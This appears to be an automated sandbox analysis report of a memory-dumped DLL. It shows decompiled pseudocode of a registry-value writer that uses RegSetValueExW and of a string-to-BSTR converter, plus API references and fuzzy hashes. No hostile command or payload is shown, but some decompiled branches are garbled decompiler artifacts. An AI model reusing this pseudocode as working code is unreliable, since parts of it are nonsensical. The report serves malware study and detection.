0x6e7d5459
0x6e7d5529
0x00000000
0x6e7d545f
0x6e7d5461
0x6e7d5465
0x6e7d5467
0x6e7d5467
0x6e7d5469
0x6e7d5469
0x6e7d546c
0x6e7d5470
0x6e7d5470
0x6e7d5467
0x6e7d5475
0x6e7d547a
0x6e7d547d
0x6e7d547f
0x6e7d5480
0x6e7d548a
0x6e7d548c
0x6e7d5491
0x6e7d552e
0x6e7d552e
0x00000000
0x6e7d5497
0x6e7d5499
0x6e7d54a0
0x6e7d54a0
0x6e7d54a2
0x6e7d54a5
0x6e7d54a9
0x6e7d54a9
0x6e7d54ae
0x6e7d54b3
0x6e7d54b6
0x6e7d54b8
0x6e7d54b9
0x6e7d54c3
0x6e7d54c5
0x6e7d54ca
0x6e7d5533
0x6e7d5533
0x6e7d553b
0x6e7d5544
0x6e7d5549
0x6e7d554a
0x6e7d554b
0x6e7d554c
0x6e7d554d
0x6e7d554e
0x6e7d554f
0x6e7d5553
0x6e7d5556
0x6e7d555c
0x6e7d5569
0x6e7d54cc
0x6e7d54ce
0x6e7d54d0
0x6e7d54d0
0x6e7d54d2
0x6e7d54d5
0x6e7d54d9
0x6e7d54d9
0x6e7d54e2
0x6e7d54e5
0x6e7d5501
0x6e7d5509
0x6e7d550f
0x6e7d5512
0x6e7d5518
0x6e7d5526
0x6e7d54e7
0x6e7d54e7
0x6e7d54f0
0x6e7d54fe
0x6e7d54fe
0x6e7d54e5
0x6e7d54ca
0x6e7d5491

APIs

__Getcvt.LIBCPMT ref: 6E7D53FE
__Getcvt.LIBCPMT ref: 6E7D5423

Strings

false, xrefs: 6E7D5480
true, xrefs: 6E7D54B9
Unknown exception, xrefs: 6E7D544C

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: Unknown exception$false$true
API String ID: 1921796781-1228625832
Opcode ID: 05c45469d2db2ae0f40c00946a0b454431f9d8960909ed18856055b1852c50df
Instruction ID: 7aca5d305367aef7d9698cf8647fcd51f6f16b83e11a8243b94ad884eee07b8e
Opcode Fuzzy Hash: 05c45469d2db2ae0f40c00946a0b454431f9d8960909ed18856055b1852c50df
Instruction Fuzzy Hash: 6451BC31A042458FDB11CFE8DA407DABFB9EF81314F1485AEDC445B395C776990ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DE6A0, Relevance: 16.9, APIs: 11, Instructions: 353
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E7DE6A0(char __ecx, void* __edx, void* __fp0, WCHAR* _a4, short* _a8, intOrPtr _a12) {
				int _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				WCHAR* _v36;
				char _v8216;
				int _v8220;
				char _v8224;
				signed char _v8228;
				char _v8484;
				char* _v8488;
				char _v8492;
				short* _v8496;
				void** _v8500;
				signed char _v8504;
				intOrPtr _v8508;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t106;
				signed int _t107;
				int _t114;
				char* _t116;
				char* _t118;
				char* _t120;
				char* _t125;
				void* _t126;
				char* _t127;
				signed int _t130;
				signed int _t131;
				int _t132;
				char* _t133;
				void* _t138;
				char* _t158;
				long _t160;
				WCHAR* _t161;
				char* _t165;
				char* _t172;
				intOrPtr _t176;
				char* _t182;
				void* _t188;
				signed int _t191;
				short* _t196;
				char* _t199;
				intOrPtr* _t201;
				signed char _t203;
				signed int _t204;
				signed char _t205;
				intOrPtr* _t217;
				char* _t224;
				signed int _t227;
				char _t228;
				intOrPtr* _t233;
				void* _t236;
				void* _t242;
				void* _t243;
				char* _t245;
				void* _t246;
				signed int* _t249;
				WCHAR* _t251;
				char* _t255;
				WCHAR* _t256;
				int _t257;
				signed int _t258;
				char* _t262;
				WCHAR** _t263;
				char* _t266;
				char* _t267;
				int _t269;
				signed char _t270;
				signed int _t272;
				signed int _t276;
				void* _t284;
				void* _t292;

				_t292 = __fp0;
				_t242 = __edx;
				_t272 = _t276;
				_push(0xffffffff);
				_push(E6E809276);
				_push( *[fs:0x0]);
				_push(__ecx);
				E6E807C50();
				_t106 =  *0x6e81e008; // 0x77dcee0d
				_t107 = _t106 ^ _t272;
				_v24 = _t107;
				_push(_t107);
				 *[fs:0x0] =  &_v16;
				_v20 = _t276;
				_v8492 = __ecx;
				_t251 = _a4;
				_t196 = _a8;
				_v8508 = _a12;
				_v8224 = __ecx;
				_v8500 = _t251;
				_v8496 = _t196;
				if(E6E7DE4E0(__ecx,  &_v8216) < 0) {
					L73:
					 *[fs:0x0] = _v16;
					return E6E7E440A(_v24 ^ _t272);
				} else {
					_t114 = lstrcmpiW( &_v8216, "S");
					if(_t114 != 0) {
						_t116 = lstrcmpiW( &_v8216, "M");
						__eflags = _t116;
						if(_t116 != 0) {
							_t118 = lstrcmpiW( &_v8216, "D");
							__eflags = _t118;
							if(_t118 != 0) {
								_t120 = lstrcmpiW( &_v8216, "B");
								__eflags = _t120;
								if(_t120 != 0) {
									goto L73;
								} else {
									_t19 =  &(_t120[0x11]); // 0x11
									_t262 = _t19;
									goto L9;
								}
							} else {
								_t17 =  &(_t118[0x13]); // 0x13
								_t262 = _t17;
								goto L9;
							}
						} else {
							_t262 = 0x4008;
							goto L9;
						}
					} else {
						_t14 = _t114 + 8; // 0x8
						_t262 = _t14;
						L9:
						E6E7DE490(_v8492);
						if(E6E7DE4E0(_v8492,  &_v8216) < 0) {
							goto L73;
						} else {
							_t284 = _t262 - 0x13;
							if(_t284 > 0) {
								__eflags = _t262 - 0x4008;
								if(_t262 != 0x4008) {
									goto L71;
								} else {
									_t217 =  &_v8216;
									_t243 = _t217 + 2;
									do {
										_t127 =  *_t217;
										_t217 = _t217 + 2;
										__eflags = _t127;
									} while (_t127 != 0);
									_t263 = (_t217 - _t243 >> 1) + 2;
									E6E7E8BE0(_t251,  &_v8488, 0, 0x104);
									_v8488 = 0;
									_t130 = _t263;
									_v8 = 0;
									_v8 = 1;
									_t244 = _t130 * 2 >> 0x20;
									_t131 = _t130 * 2;
									__eflags = _t130 * 2 >> 0x20;
									if(__eflags > 0) {
										L74:
										_t132 = E6E7D81D0(0x80070216);
										asm("into");
										0x57515a43();
										if(__eflags >= 0) {
											L81:
											if(__eflags < 0) {
												goto L79;
											} else {
												goto L83;
											}
										} else {
											asm("fsubr st0, st0");
											if(__eflags >= 0) {
												L83:
												_t132 = 1;
												goto L84;
											} else {
												asm("fucomp st0");
												if(__eflags >= 0) {
													L84:
													_t102 =  &(_t196[0x2e]);
													 *_t102 = _t196 + _t196[0x2e];
													__eflags =  *_t102;
													return _t132;
												} else {
													 *_t132 =  *_t132 + _t132;
													 *_t132 =  *_t132 + _t132;
													 *_t132 =  *_t132 + _t132;
													 *_t132 =  *_t132 + _t132;
													 *_t132 =  *_t132 + _t132;
													_t138 = _t132 +  *_t196 +  *_t196 +  *_t196 +  *2;
													 *2 =  *2 + _t138;
													 *2 =  *2 + _t138;
													 *_t196 =  *_t196 + _t138;
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t272);
													_push(_t196);
													_t196 = lstrcmpiW;
													_push(_t263);
													_push(_t251);
													_t251 = _v36;
													_t263 = 0x6e818470;
													L79:
													_t133 = lstrcmpiW(_t251,  *_t263);
													__eflags = _t133;
													if(_t133 == 0) {
														__eflags = 0;
														return 0;
													} else {
														_t263 =  &(_t263[1]);
														__eflags = _t263 - 0x6e8184a0;
														goto L81;
													}
												}
											}
										}
									} else {
										if(__eflags < 0) {
											L47:
											__eflags = _t131 - 0x100;
											if(__eflags <= 0) {
												_t266 =  &_v8484;
												_v8488 = _t266;
											} else {
												E6E7E2650(_t196,  &_v8488, _t244, _t251, __eflags, _t292, _t131);
												_t266 = _v8488;
											}
											__eflags = _t266;
											if(_t266 == 0) {
												_t255 = 0xe;
											} else {
												__eflags = _v8216;
												_t256 =  &_v8216;
												if(_v8216 != 0) {
													do {
														_t161 = CharNextW(_t256);
														_t228 =  *_t256 & 0x0000ffff;
														__eflags = _t228 - 0x5c;
														if(_t228 != 0x5c) {
															L57:
															 *_t266 = _t228;
															_t256 =  &(_t256[1]);
															__eflags = _t256;
														} else {
															__eflags =  *_t161 - 0x30;
															if( *_t161 != 0x30) {
																goto L57;
															} else {
																 *_t266 = 0;
																_t256 = CharNextW(_t161);
															}
														}
														_t266 =  &(_t266[2]);
														__eflags =  *_t256;
													} while ( *_t256 != 0);
												}
												 *_t266 = 0;
												_t266 = _v8488;
												__eflags = _t266;
												if(_t266 != 0) {
													_t257 = 0;
													__eflags = 0;
													_t245 = _t266;
													do {
														_t224 = _t245;
														_t87 =  &(_t224[2]); // 0x2
														_t199 = _t87;
														asm("o16 nop [eax+eax]");
														do {
															_t158 =  *_t224;
															_t224 =  &(_t224[2]);
															__eflags = _t158;
														} while (_t158 != 0);
														_t227 = (_t224 - _t199 >> 1) + 1;
														_t245 = _t245 + _t227 * 2;
														_t257 = _t257 + _t227 * 2;
														__eflags = _t227 - 1;
													} while (_t227 != 1);
													_t160 = RegSetValueExW( *_v8500, _v8496, 0, 7, _t266, _t257);
													_t266 = _v8488;
													_t255 = _t160;
												} else {
													_t255 = 0xd;
												}
											}
											__eflags = _t266 -  &_v8484;
											if(_t266 !=  &_v8484) {
												E6E7E2340( &_v8488);
											}
											goto L69;
										} else {
											__eflags = _t131 - 0xffffffff;
											if(_t131 > 0xffffffff) {
												goto L74;
											} else {
												goto L47;
											}
										}
									}
								}
							} else {
								if(_t284 == 0) {
									_v8220 = 0;
									_t165 =  &_v8216;
									__imp__#277(_t165, 0, 0,  &_v8228);
									_t267 = _t165;
									__eflags = _t267;
									if(_t267 >= 0) {
										_v8224 = _v8228;
										_t255 = RegSetValueExW( *_t251, _t196, 0, 4,  &_v8224, 4);
										E6E7DBA40( &_v8220);
										goto L69;
									} else {
										E6E7DBA40( &_v8220);
									}
								} else {
									if(_t262 == 8) {
										_t233 =  &_v8216;
										_t246 = _t233 + 2;
										do {
											_t172 =  *_t233;
											_t233 = _t233 + 2;
											__eflags = _t172;
										} while (_t172 != 0);
										_t255 = RegSetValueExW( *_t251, _t196, 0, 1,  &_v8216, 2 + (_t233 - _t246 >> 1) * 2);
										goto L69;
									} else {
										if(_t262 != 0x11) {
											L71:
											_t125 = E6E7DE4E0(_v8492, _v8508);
											__eflags = _t125;
											_t216 =  <  ? _t125 : 0;
											_t126 =  <  ? _t125 : 0;
										} else {
											_t201 =  &_v8216;
											_t236 = _t201 + 2;
											do {
												_t176 =  *_t201;
												_t201 = _t201 + 2;
											} while (_t176 != 0);
											_t203 = _t201 - _t236 >> 1;
											_v8504 = _t203;
											_v8228 = _t203;
											if((_t203 & 0x00000001) != 0) {
												L22:
											} else {
												asm("cdq");
												_t269 = _t203 - _t242 >> 1;
												_v8220 = _t269;
												E6E7E8BE0(_t251,  &_v8488, 0, 0x104);
												_v8488 = 0;
												_v8 = 3;
												_v8 = 4;
												_t289 = _t269 - 0x100;
												if(_t269 <= 0x100) {
													_t182 =  &_v8484;
													_v8488 = _t182;
												} else {
													E6E7E2650(_t203,  &_v8488, _t242, _t251, _t289, _t292, _t269);
													_t182 = _v8488;
												}
												if(_t182 != 0) {
													E6E7E8BE0(_t251, _t182, 0, _t269);
													_t258 = 0;
													__eflags = _t203;
													if(_t203 > 0) {
														_t270 = _v8504;
														do {
															_t204 =  *(_t272 + _t258 * 2 - 0x2014) & 0x0000ffff;
															_t188 = _t204 - 0x30;
															__eflags = _t188 - 0x36;
															if(_t188 > 0x36) {
																L30:
																_t205 = 0;
																__eflags = 0;
															} else {
																switch( *((intOrPtr*)(( *(_t188 + 0x6e7debd0) & 0x000000ff) * 4 +  &M6E7DEBC0))) {
																	case 0:
																		_t205 = _t204 - 0x30;
																		goto L31;
																	case 1:
																		__bl = __bl - 0x37;
																		goto L31;
																	case 2:
																		__bl = __bl - 0x57;
																		goto L31;
																	case 3:
																		goto L30;
																}
															}
															L31:
															_t249 =  &(_v8488[_t258 >> 1]);
															_t191 = (_t258 & 0x00000001) << 2;
															_t258 = _t258 + 1;
															 *_t249 =  *_t249 | _t205 << 0x00000004 - _t191;
															__eflags = _t258 - _t270;
														} while (_t258 < _t270);
														_t269 = _v8220;
													}
													_t255 = RegSetValueExW( *_v8500, _v8496, 0, 3, _v8488, _t269);
													__eflags = _v8488 -  &_v8484;
													if(_v8488 !=  &_v8484) {
														E6E7E2340( &_v8488);
													}
													L69:
													__eflags = _t255;
													if(_t255 == 0) {
														goto L71;
													} else {
														E6E7DD8C0(_t255);
													}
												} else {
													E6E7E2340( &_v8488);
													goto L22;
												}
											}
										}
									}
								}
								goto L73;
							}
						}
					}
				}
			}

0x6e7de6a0
0x6e7de6a0
0x6e7de6a1
0x6e7de6a3
0x6e7de6a5
0x6e7de6b0
0x6e7de6b1
0x6e7de6b7
0x6e7de6bc
0x6e7de6c1
0x6e7de6c3
0x6e7de6c9
0x6e7de6cd
0x6e7de6d3
0x6e7de6d6
0x6e7de6df
0x6e7de6e2
0x6e7de6e5
0x6e7de6f2
0x6e7de6f8
0x6e7de6fe
0x6e7de70b
0x6e7deb97
0x6e7deb9a
0x6e7debb2
0x6e7de711
0x6e7de723
0x6e7de727
0x6e7de73a
0x6e7de73c
0x6e7de73e
0x6e7de753
0x6e7de755
0x6e7de757
0x6e7de76a
0x6e7de76c
0x6e7de76e
0x00000000
0x6e7de774
0x6e7de774
0x6e7de774
0x00000000
0x6e7de774
0x6e7de759
0x6e7de759
0x6e7de759
0x00000000
0x6e7de759
0x6e7de740
0x6e7de740
0x00000000
0x6e7de740
0x6e7de729
0x6e7de729
0x6e7de729
0x6e7de777
0x6e7de77d
0x6e7de796
0x00000000
0x6e7de79c
0x6e7de79c
0x6e7de79f
0x6e7de9f3
0x6e7de9f9
0x00000000
0x6e7de9ff
0x6e7de9ff
0x6e7dea05
0x6e7dea10
0x6e7dea10
0x6e7dea13
0x6e7dea16
0x6e7dea16
0x6e7dea2d
0x6e7dea30
0x6e7dea38
0x6e7dea42
0x6e7dea44
0x6e7dea50
0x6e7dea54
0x6e7dea54
0x6e7dea56
0x6e7dea58
0x6e7debb5
0x6e7debba
0x6e7debc0
0x6e7debc1
0x6e7debc6
0x6e7dec36
0x6e7dec36
0x00000000
0x6e7dec38
0x00000000
0x6e7dec39
0x6e7debc8
0x6e7debc8
0x6e7debca
0x6e7dec3a
0x6e7dec3a
0x00000000
0x6e7debcc
0x6e7debcc
0x6e7debce
0x6e7dec3e
0x6e7dec3e
0x6e7dec3e
0x6e7dec3e
0x6e7dec41
0x6e7debd0
0x6e7debd0
0x6e7debd2
0x6e7debd4
0x6e7debd6
0x6e7debd8
0x6e7debe0
0x6e7debe2
0x6e7debe4
0x6e7debe6
0x6e7dec08
0x6e7dec09
0x6e7dec0a
0x6e7dec0b
0x6e7dec0c
0x6e7dec0d
0x6e7dec0e
0x6e7dec0f
0x6e7dec10
0x6e7dec13
0x6e7dec14
0x6e7dec1a
0x6e7dec1b
0x6e7dec1c
0x6e7dec1f
0x6e7dec24
0x6e7dec27
0x6e7dec29
0x6e7dec2b
0x6e7dec46
0x6e7dec4a
0x6e7dec2d
0x6e7dec2d
0x6e7dec30
0x00000000
0x6e7dec30
0x6e7dec2b
0x6e7debce
0x6e7debca
0x6e7dea5e
0x6e7dea5e
0x6e7dea69
0x6e7dea69
0x6e7dea6e
0x6e7dea7e
0x6e7dea84
0x6e7dea70
0x6e7dea77
0x6e7dea9e
0x6e7dea9e
0x6e7deaa4
0x6e7deaa6
0x6e7deb4f
0x6e7deaac
0x6e7deaac
0x6e7deab4
0x6e7deaba
0x6e7deac2
0x6e7deac3
0x6e7deac5
0x6e7deac8
0x6e7deacb
0x6e7deadf
0x6e7deadf
0x6e7deae2
0x6e7deae2
0x6e7deacd
0x6e7deacd
0x6e7dead1
0x00000000
0x6e7dead3
0x6e7dead6
0x6e7deadb
0x6e7deadb
0x6e7dead1
0x6e7deae5
0x6e7deae8
0x6e7deae8
0x6e7deac2
0x6e7deaf0
0x6e7deaf2
0x6e7deaf8
0x6e7deafa
0x6e7deb01
0x6e7deb01
0x6e7deb03
0x6e7deb05
0x6e7deb05
0x6e7deb07
0x6e7deb07
0x6e7deb0a
0x6e7deb10
0x6e7deb10
0x6e7deb13
0x6e7deb16
0x6e7deb16
0x6e7deb1f
0x6e7deb20
0x6e7deb23
0x6e7deb26
0x6e7deb26
0x6e7deb3f
0x6e7deb45
0x6e7deb4b
0x6e7deafc
0x6e7deafc
0x6e7deafc
0x6e7deafa
0x6e7deb5a
0x6e7deb5c
0x6e7deb64
0x6e7deb64
0x00000000
0x6e7dea60
0x6e7dea60
0x6e7dea63
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7dea63
0x6e7dea5e
0x6e7dea58
0x6e7de7a5
0x6e7de7a5
0x6e7de98b
0x6e7de99a
0x6e7de9a1
0x6e7de9a7
0x6e7de9a9
0x6e7de9ab
0x6e7de9c7
0x6e7de9e7
0x6e7de9e9
0x00000000
0x6e7de9ad
0x6e7de9b3
0x6e7de9b8
0x6e7de7ab
0x6e7de7ae
0x6e7de94a
0x6e7de950
0x6e7de953
0x6e7de953
0x6e7de956
0x6e7de959
0x6e7de959
0x6e7de97e
0x00000000
0x6e7de7b4
0x6e7de7b7
0x6e7deb76
0x6e7deb82
0x6e7deb89
0x6e7deb8b
0x6e7deb8e
0x6e7de7bd
0x6e7de7bd
0x6e7de7c3
0x6e7de7c6
0x6e7de7c6
0x6e7de7c9
0x6e7de7cc
0x6e7de7d3
0x6e7de7d5
0x6e7de7db
0x6e7de7e4
0x6e7de887
0x6e7de7ea
0x6e7de7ec
0x6e7de7fe
0x6e7de801
0x6e7de807
0x6e7de80f
0x6e7de819
0x6e7de820
0x6e7de824
0x6e7de82a
0x6e7de86c
0x6e7de872
0x6e7de82c
0x6e7de833
0x6e7de838
0x6e7de838
0x6e7de87a
0x6e7de895
0x6e7de89d
0x6e7de89f
0x6e7de8a1
0x6e7de8a3
0x6e7de8b0
0x6e7de8b0
0x6e7de8b8
0x6e7de8bb
0x6e7de8be
0x6e7de8dd
0x6e7de8dd
0x6e7de8dd
0x6e7de8c0
0x6e7de8c7
0x00000000
0x6e7de8ce
0x00000000
0x00000000
0x6e7de8d3
0x00000000
0x00000000
0x6e7de8d8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7de8c7
0x6e7de8df
0x6e7de8e8
0x6e7de8f3
0x6e7de8f6
0x6e7de8fb
0x6e7de8fd
0x6e7de8fd
0x6e7de901
0x6e7de901
0x6e7de926
0x6e7de92e
0x6e7de934
0x6e7de940
0x6e7de940
0x6e7deb69
0x6e7deb69
0x6e7deb6b
0x00000000
0x6e7deb6d
0x6e7deb6f
0x6e7deb6f
0x6e7de87c
0x6e7de882
0x00000000
0x6e7de882
0x6e7de87a
0x6e7de7e4
0x6e7de7b7
0x6e7de7ae
0x00000000
0x6e7de7a5
0x6e7de79f
0x6e7de796
0x6e7de727

APIs

Part of subcall function 6E7DE4E0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,77DCEE0D,00000000,00000000), ref: 6E7DE51E
Part of subcall function 6E7DE4E0: CharNextW.USER32(00000000,?,?,00000000), ref: 6E7DE54B
Part of subcall function 6E7DE4E0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE564
Part of subcall function 6E7DE4E0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE56F
Part of subcall function 6E7DE4E0: CharNextW.USER32(00000001,?,?,00000000), ref: 6E7DE5DE

lstrcmpiW.KERNEL32(?,6E817A28,?,77DCEE0D,C000008C,00000000,?,?,00000000,6E809276,000000FF,?,6E7DF727,00000000,00000000,C000008C), ref: 6E7DE723
lstrcmpiW.KERNEL32(?,6E817A2C,?,6E7DF727,00000000,00000000,C000008C,C000008C), ref: 6E7DE73A

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: e2dee2331302c82e4ccd80757503a37ea58c9576fac01d44c7bdcd6e75612b5f
Instruction ID: 11acf0cfe258b64788c5d0d2c5d97876575ea92a0d85d638db478ae5f4e87e2d
Opcode Fuzzy Hash: e2dee2331302c82e4ccd80757503a37ea58c9576fac01d44c7bdcd6e75612b5f
Instruction Fuzzy Hash: 8BD1A431D0022DCADB26CF94CE58BD9B7B9EB59310F0504EAE649A7260D730AE9DCF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7E60, Relevance: 16.7, APIs: 11, Instructions: 156
memoryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E7E7E60(void* __ebx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				intOrPtr _v60;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t39;
				void* _t51;
				short* _t52;
				int _t53;
				char* _t59;
				int _t60;
				char* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				char* _t70;
				intOrPtr _t71;
				int _t72;
				intOrPtr* _t73;
				short* _t76;
				signed int _t80;
				void* _t82;
				short* _t83;

				_push(0xfffffffe);
				_push(0x6e81bdd0);
				_push(E6E7E8A10);
				_push( *[fs:0x0]);
				_t83 = _t82 - 0x18;
				_t30 =  *0x6e81e008; // 0x77dcee0d
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t80;
				_v32 = _t31;
				_push(_t76);
				_push(_t72);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t83;
				_t59 = _a4;
				if(_t59 != 0) {
					_t62 = _t59;
					_t7 =  &(_t62[1]); // 0x6e7d8356
					_t70 = _t7;
					do {
						_t33 =  *_t62;
						_t62 =  &(_t62[1]);
					} while (_t33 != 0);
					_t63 = _t62 - _t70;
					_t8 = _t63 + 1; // 0x6e7d8357
					_t34 = _t8;
					_v44 = _t34;
					if(_t34 > 0x7fffffff) {
						E6E7E7D20(0x80070057);
						goto L17;
					} else {
						_t72 = MultiByteToWideChar(0, 0, _t59, _t34, 0, 0);
						_v40 = _t72;
						if(_t72 == 0) {
							L17:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E6E7E7D20(_t36);
							goto L20;
						} else {
							_v8 = 0;
							_t51 = _t72 + _t72;
							if(_t72 >= 0x1000) {
								_push(_t51);
								_t52 = E6E7F5A74(_t63);
								_t83 =  &(_t83[2]);
								_t76 = _t52;
								_v36 = _t76;
								_v8 = 0xfffffffe;
							} else {
								E6E807800();
								_v28 = _t83;
								_t76 = _t83;
								_v36 = _t76;
								_v8 = 0xfffffffe;
							}
							if(_t76 == 0) {
								L20:
								E6E7E7D20(0x8007000e);
								goto L21;
							} else {
								_t53 = MultiByteToWideChar(0, 0, _t59, _v44, _t76, _t72);
								if(_t53 == 0) {
									L21:
									if(_t72 >= 0x1000) {
										E6E7EE3B8(_t76);
										_t83 =  &(_t83[2]);
									}
									_t39 = GetLastError();
									if(_t39 > 0) {
										_t39 = _t39 & 0x0000ffff | 0x80070000;
									}
									E6E7E7D20(_t39);
									goto L26;
								} else {
									__imp__#2(_t76);
									_t60 = _t53;
									if(_t72 >= 0x1000) {
										E6E7EE3B8(_t76);
										_t83 =  &(_t83[2]);
									}
									if(_t60 == 0) {
										L26:
										E6E7E7D20(0x8007000e);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t80);
										_t71 = _v60;
										_push(_t72);
										_t73 = _t63;
										 *_t73 = 0x6e80d718;
										 *((intOrPtr*)(_t73 + 4)) =  *((intOrPtr*)(_t71 + 4));
										_t64 =  *((intOrPtr*)(_t71 + 8));
										 *((intOrPtr*)(_t73 + 8)) = _t64;
										 *(_t73 + 0xc) = 0;
										if(_t64 != 0) {
											 *0x6e80a2fc(_t64, _t76);
											 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 4))))();
										}
										return _t73;
									} else {
										goto L15;
									}
								}
							}
						}
					}
				} else {
					L15:
					 *[fs:0x0] = _v20;
					return E6E7E440A(_v32 ^ _t80);
				}
			}

0x6e7e7e63
0x6e7e7e65
0x6e7e7e6a
0x6e7e7e75
0x6e7e7e76
0x6e7e7e79
0x6e7e7e7e
0x6e7e7e81
0x6e7e7e83
0x6e7e7e87
0x6e7e7e88
0x6e7e7e89
0x6e7e7e8d
0x6e7e7e93
0x6e7e7e96
0x6e7e7e9b
0x6e7e7ea4
0x6e7e7ea6
0x6e7e7ea6
0x6e7e7eb0
0x6e7e7eb0
0x6e7e7eb2
0x6e7e7eb3
0x6e7e7eb7
0x6e7e7eb9
0x6e7e7eb9
0x6e7e7ebc
0x6e7e7ec4
0x6e7e7f9f
0x00000000
0x6e7e7eca
0x6e7e7eda
0x6e7e7edc
0x6e7e7ee1
0x6e7e7fa4
0x6e7e7fa4
0x6e7e7fac
0x6e7e7fb1
0x6e7e7fb1
0x6e7e7fb7
0x00000000
0x6e7e7ee7
0x6e7e7ee7
0x6e7e7eee
0x6e7e7ef7
0x6e7e7f0f
0x6e7e7f10
0x6e7e7f15
0x6e7e7f18
0x6e7e7f1a
0x6e7e7f1d
0x6e7e7ef9
0x6e7e7ef9
0x6e7e7efe
0x6e7e7f01
0x6e7e7f03
0x6e7e7f06
0x6e7e7f06
0x6e7e7f43
0x6e7e7fbc
0x6e7e7fc1
0x00000000
0x6e7e7f45
0x6e7e7f4f
0x6e7e7f57
0x6e7e7fc6
0x6e7e7fcc
0x6e7e7fcf
0x6e7e7fd4
0x6e7e7fd4
0x6e7e7fd7
0x6e7e7fdf
0x6e7e7fe4
0x6e7e7fe4
0x6e7e7fea
0x00000000
0x6e7e7f59
0x6e7e7f5a
0x6e7e7f60
0x6e7e7f68
0x6e7e7f6b
0x6e7e7f70
0x6e7e7f70
0x6e7e7f75
0x6e7e7fef
0x6e7e7ff4
0x6e7e7ff9
0x6e7e7ffa
0x6e7e7ffb
0x6e7e7ffc
0x6e7e7ffd
0x6e7e7ffe
0x6e7e7fff
0x6e7e8000
0x6e7e8003
0x6e7e8006
0x6e7e8007
0x6e7e8009
0x6e7e8012
0x6e7e8015
0x6e7e8018
0x6e7e801b
0x6e7e8024
0x6e7e802f
0x6e7e8035
0x6e7e8037
0x6e7e803c
0x6e7e7f77
0x00000000
0x6e7e7f77
0x6e7e7f75
0x6e7e7f57
0x6e7e7f43
0x6e7e7ee1
0x6e7e7e9d
0x6e7e7f79
0x6e7e7f7f
0x6e7e7f97
0x6e7e7f97

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6E7D8355,6E7D8357,00000000,00000000,77DCEE0D,?,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7ED4
__alloca_probe_16.LIBCMT ref: 6E7E7EF9
MultiByteToWideChar.KERNEL32(00000000,00000000,6E7D8355,?,00000000,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7F4F
SysAllocString.OLEAUT32(00000000), ref: 6E7E7F5A
_com_issue_error.COMSUPP ref: 6E7E7F9F
GetLastError.KERNEL32(80070057,77DCEE0D,?,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7FA4
_com_issue_error.COMSUPP ref: 6E7E7FB7
_com_issue_error.COMSUPP ref: 6E7E7FC1
GetLastError.KERNEL32(8007000E,00000000,?,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7FD7
_com_issue_error.COMSUPP ref: 6E7E7FEA
_com_issue_error.COMSUPP ref: 6E7E7FF4

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString__alloca_probe_16
String ID:
API String ID: 3079088546-0
Opcode ID: fe1e3275180e1fc3b50e4d0ff44d5fdfc3b2babc9c798a7dc64cc4b1ec5cd9b9
Instruction ID: adc047f50ba430f4f81e8a072ac049d4da049d0e722523c6ba5593e609a88f13
Opcode Fuzzy Hash: fe1e3275180e1fc3b50e4d0ff44d5fdfc3b2babc9c798a7dc64cc4b1ec5cd9b9
Instruction Fuzzy Hash: C941F871A00209ABDB00CFE8C944BEEBBA8EF49714F10466AF519E7AD1D7349502CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E2AE0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195
registryCOMMON

